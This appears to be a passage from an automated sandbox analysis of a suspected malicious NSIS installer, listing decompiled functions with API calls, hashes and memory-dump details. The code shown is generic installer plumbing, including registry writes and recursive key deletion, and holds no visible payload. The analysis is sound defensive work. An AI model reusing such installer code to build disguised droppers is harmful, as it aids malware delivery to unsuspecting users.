                                            • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                            • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404782, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404782(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                            0x00404790
                                            0x0040479d
                                            0x004047a3
                                            0x004047e1
                                            0x004047e1
                                            0x004047f0
                                            0x004047f7
                                            0x00000000
                                            0x004047f9
                                            0x004047a5
                                            0x004047b4
                                            0x004047bc
                                            0x004047bf
                                            0x004047d1
                                            0x004047d7
                                            0x004047de
                                            0x00000000
                                            0x004047de
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                            • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                            • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                            • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414c40; // 0x8800
					_t11 =  *0x428c50;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                            0x00402b7b
                                            0x00402b89
                                            0x00402b8f
                                            0x00402b8f
                                            0x00402b9d
                                            0x00402b9f
                                            0x00402ba5
                                            0x00402bac
                                            0x00402bae
                                            0x00402bae
                                            0x00402bc4
                                            0x00402bd4
                                            0x00402be6
                                            0x00402be6
                                            0x00402bee

                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                            • MulDiv.KERNEL32(00008800,00000064,?), ref: 00402BB4
                                            • wsprintfA.USER32 ref: 00402BC4
                                            • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                            • SetDlgItemTextA.USER32 ref: 00402BE6
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402BBE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                            • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                            • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                            • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 729110A0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 44%
                                            			E729110A0(WCHAR* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr* _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t47;
				WCHAR* _t49;
				WCHAR* _t57;
				intOrPtr* _t82;

				_v12 = 0;
				_t47 = _a16;
				 *_t47 = 0;
				0x72910000(_a8, L"new:", 4);
				if(_t47 == 0) {
					_v16 =  &(_a8[4]);
					_t49 = E72911D50(_v16,  &_v36);
					if(_t49 != 0) {
						L6:
						0x72910000(0x20);
						_v8 = _t49;
						if(_v8 != 0) {
							 *_v8 = 0x729140d8;
							 *((intOrPtr*)(_v8 + 4)) = 0x72914134;
							 *((intOrPtr*)(_v8 + 8)) = 1;
							_t82 = _v8 + 0xc;
							 *_t82 = _v36;
							 *((intOrPtr*)(_t82 + 4)) = _v32;
							 *((intOrPtr*)(_t82 + 8)) = _v28;
							 *((intOrPtr*)(_t82 + 0xc)) = _v24;
							if(_v12 == 0) {
								L12:
								 *_a16 = _v8;
								if(_a12 != 0) {
									 *_a12 = lstrlenW(_a8);
								}
								return 0;
							}
							_t57 = lstrlenW(_v12) + _t56 + 2;
							0x72910000(_t57);
							_v20 = _t57;
							 *(_v8 + 0x1c) = _v20;
							if(_v20 != 0) {
								_t41 = _v8 + 0x1c; // 0x0
								lstrcpyW( *_t41, _v12);
								goto L12;
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 8))))(_v8);
							return 0x8007000e;
						}
						return 0x8007000e;
					}
					_t49 = _v16;
					__imp__CLSIDFromProgID(_t49,  &_v36);
					if(_t49 >= 0) {
						_v12 = _v16;
						goto L6;
					}
					return 0x800401e4;
				}
				return 0x800401e4;
			}















                                            0x729110a6
                                            0x729110ad
                                            0x729110b0
                                            0x729110c1
                                            0x729110cb
                                            0x729110dd
                                            0x729110e8
                                            0x729110f2
                                            0x72911116
                                            0x72911118
                                            0x72911120
                                            0x72911127
                                            0x72911136
                                            0x7291113f
                                            0x72911149
                                            0x72911153
                                            0x72911159
                                            0x7291115e
                                            0x72911164
                                            0x7291116a
                                            0x72911171
                                            0x729111c2
                                            0x729111c8
                                            0x729111ce
                                            0x729111dd
                                            0x729111dd
                                            0x00000000
                                            0x729111df
                                            0x7291117d
                                            0x72911182
                                            0x7291118a
                                            0x72911193
                                            0x7291119a
                                            0x729111b8
                                            0x729111bc
                                            0x00000000
                                            0x729111bc
                                            0x729111a8
                                            0x00000000
                                            0x729111aa
                                            0x00000000
                                            0x72911129
                                            0x729110f8
                                            0x729110fc
                                            0x72911104
                                            0x72911113
                                            0x00000000
                                            0x72911113
                                            0x00000000
                                            0x72911106
                                            0x00000000

                                            APIs
                                            • CLSIDFromProgID.OLE32(?,?), ref: 729110FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FromProg
                                            • String ID: new:
                                            • API String ID: 3303861117-315842660
                                            • Opcode ID: 85b42d3b6e7c229a0d67cd21f854217bd3f23d9312ed87acf00b29d4b8cda153
                                            • Instruction ID: 3d0ae6ab27c70338010dc9795ca53e92d09d5736d7eb1fe3882a5ef890c0de36
                                            • Opcode Fuzzy Hash: 85b42d3b6e7c229a0d67cd21f854217bd3f23d9312ed87acf00b29d4b8cda153
                                            • Instruction Fuzzy Hash: 21410AB5A0020EEFCB05CF9AC944B9EB7B5BB48304F249598E905AB344D735EA41CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x42ecd0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a440 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
				return 0;
			}











                                            0x00402337
                                            0x0040233c
                                            0x00402346
                                            0x00402350
                                            0x00402353
                                            0x0040235d
                                            0x0040236d
                                            0x00402374
                                            0x0040237c
                                            0x0040238a
                                            0x0040238e
                                            0x00402399
                                            0x00402399
                                            0x0040239d
                                            0x004023a1
                                            0x004023a7
                                            0x004023ac
                                            0x004023ac
                                            0x004023b0
                                            0x004023bc
                                            0x004023bc
                                            0x004023d5
                                            0x004023d7
                                            0x004023d7
                                            0x004023da
                                            0x004024b0
                                            0x004024b0
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslF1C.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                            • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nslF1C.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nslF1C.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nslF1C.tmp
                                            • API String ID: 1356686001-2562403047
                                            • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                            • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                                            • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                            • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004038E3, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004038E3(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B3E(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ec64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ec30; // 0x5f5d20
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ec60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e400 = _t18[1];
					 *0x42ecc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e3fc = _t23;
						E00405B25(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "hyeatlxkvdhyymhha Setup", 0xfffffffe));
						_t11 =  *0x42ec4c; // 0x4
						_t27 =  *0x42ec48; // 0x5f5ecc
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x5f5ee4
								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                            0x004038e7
                                            0x004038ec
                                            0x004038f2
                                            0x004038f7
                                            0x004038f7
                                            0x004038ff
                                            0x00000000
                                            0x00000000
                                            0x00403901
                                            0x00403907
                                            0x0040390f
                                            0x00403911
                                            0x00403917
                                            0x00403917
                                            0x00403919
                                            0x00403925
                                            0x00000000
                                            0x00000000
                                            0x00403929
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040392b
                                            0x00403930
                                            0x00403939
                                            0x0040393f
                                            0x00403944
                                            0x00403958
                                            0x00403963
                                            0x0040397b
                                            0x00403981
                                            0x00403986
                                            0x0040398e
                                            0x004039af
                                            0x004039af
                                            0x004039af
                                            0x00403990
                                            0x00403992
                                            0x00403992
                                            0x00403996
                                            0x00403999
                                            0x0040399d
                                            0x0040399d
                                            0x004039a2
                                            0x004039a8
                                            0x004039a8
                                            0x00000000
                                            0x00403992
                                            0x00403946
                                            0x0040394b
                                            0x00403954
                                            0x0040394d
                                            0x0040394d
                                            0x0040394d
                                            0x0040394b

                                            APIs
                                            • SetWindowTextA.USER32(00000000,hyeatlxkvdhyymhha Setup), ref: 0040397B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: TextWindow
                                            • String ID: ]_$"C:\Users\user\Desktop\DN_467842234567.exe" $1033$hyeatlxkvdhyymhha Setup
                                            • API String ID: 530164218-852911688
                                            • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                            • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                            • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                            • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ecd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F57(4);
					if(_t27 == 0) {
						__eflags =  *0x42ecd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
				}
				return _t18;
			}










                                            0x00402a79
                                            0x00402a8a
                                            0x00402a92
                                            0x00402aba
                                            0x00402aa1
                                            0x00402aa4
                                            0x00402af4
                                            0x00402afa
                                            0x00402afc
                                            0x00000000
                                            0x00402afc
                                            0x00402ab1
                                            0x00402ab6
                                            0x00402ab8
                                            0x00000000
                                            0x00000000
                                            0x00402ab8
                                            0x00402acf
                                            0x00402ad7
                                            0x00402ade
                                            0x00402b04
                                            0x00402b0a
                                            0x00000000
                                            0x00000000
                                            0x00402b12
                                            0x00402b18
                                            0x00402b1a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402b1a
                                            0x00000000
                                            0x00402aed
                                            0x00402b01

                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                            • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                            • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                            • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                            • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                            • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                            0x00401ce8
                                            0x00401cef
                                            0x00401d1e
                                            0x00401d26
                                            0x00401d2d
                                            0x00401d2d
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                            • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                            • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                            • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
			}



















                                            0x0040467e
                                            0x00404683
                                            0x0040468b
                                            0x0040468c
                                            0x00404699
                                            0x004046a1
                                            0x004046a2
                                            0x004046a4
                                            0x004046a6
                                            0x004046a8
                                            0x004046ab
                                            0x004046ab
                                            0x004046b2
                                            0x004046b8
                                            0x004046b8
                                            0x004046bf
                                            0x004046c6
                                            0x004046c9
                                            0x004046cc
                                            0x004046cc
                                            0x004046d0
                                            0x004046e0
                                            0x004046e2
                                            0x004046e5
                                            0x0040468e
                                            0x0040468e
                                            0x00404695
                                            0x00404695
                                            0x004046ed
                                            0x004046f8
                                            0x0040470e
                                            0x0040471e
                                            0x0040473a

                                            APIs
                                            • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                            • wsprintfA.USER32 ref: 0040471E
                                            • SetDlgItemTextA.USER32 ref: 00404731
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                            • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                            • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                            • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 51%
                                            			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
